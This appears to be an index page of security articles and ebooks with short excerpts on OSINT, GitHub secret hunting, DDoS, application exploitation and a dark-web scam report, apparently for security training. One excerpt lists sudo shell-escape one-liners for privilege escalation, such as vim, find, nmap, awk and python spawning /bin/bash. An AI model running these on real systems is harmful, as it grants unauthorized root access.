Case Study
Github in the wild
Github is important Oftentimes sensitive secrets stored in a target’s GitHub environment are overlooked and thus not reported in the tool output due to the limitations of automated scanning (regex, entropy searches, etc.). On the flip slide, too much information can be outputted by automated tools, making it difficult to discern true secrets from a…
Introduction to OSINT
OSINT OSINT stands for Open Source Intelligence, it’s the OSINT full form, and is one of the key aspects in understanding the cybersecurity that rules the Internet these days. The term OSINT comes from many decades ago, in fact, US military agencies started using the term OSINT in the late 1980’s as they were re-evaluating…
40 Methods for Privilege Escalation(Part 1)
Abusing Sudo Binaries Domain: No Local Admin: Yes OS: Linux Type: Abusing Privileged Files Methods: sudo vim -c ‘:!/bin/bash’ sudo find / etc/passwd -exec /bin/bash \; echo “os.execute(‘/bin/bash/’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse sudo env /bin/bash sudo awk ‘BEGIN {system(“/bin/bash”)}’ sudo perl -e ‘exec “/bin/bash”;’ sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’ sudo less /etc/hosts –…
Smart Contract Security Audit
A smart contract is an automated transaction protocol that executes the terms of a contract. They are one of the most exciting areas of blockchain technology implementation. The audit of a Smart Contract is technically the same as auditing a regular code. It entails meticulously investigating code to find security flaws and vulnerabilities before publicly…
Attacked From Behind Application(EBook)
Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. Theseapplications are often websites, but can include databases (like SQL), standard services…
Attacked From Behind Application
Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard…
DDos Methods & Mitigations(EBook)
Distributed denial of service (DDoS) attacks are a subclass of denial of service (DoS) attacks. A DDoS attack involves multiple connected online devices, collectively known as a botnet, which are used to overwhelm a target website with fake traffic. In June 2022 Cloudflare reported detecting and mitigating a 26 million RPS DDoS attack on an…
DDos Methods & Mitigations
Distributed denial of service (DDoS) attacks are a subclass of denial of service (DoS) attacks. A DDoS attack involves multiple connected online devices, collectively known as a botnet, which are used to overwhelm a target website with fake traffic. History of DDos Check out our timeline to see the progression of the largest and most…
40 Days in Deep/Dark Web About Crypto Scam(EBook)
Last year ransomware scammed more than 100 billion dollar from various organizations and users. We decide in this document research methods from seller to end client. This report was made by the Hadess and data comes from various sources such as: Dark Web , Deep Web Forums, Sellers and Websites.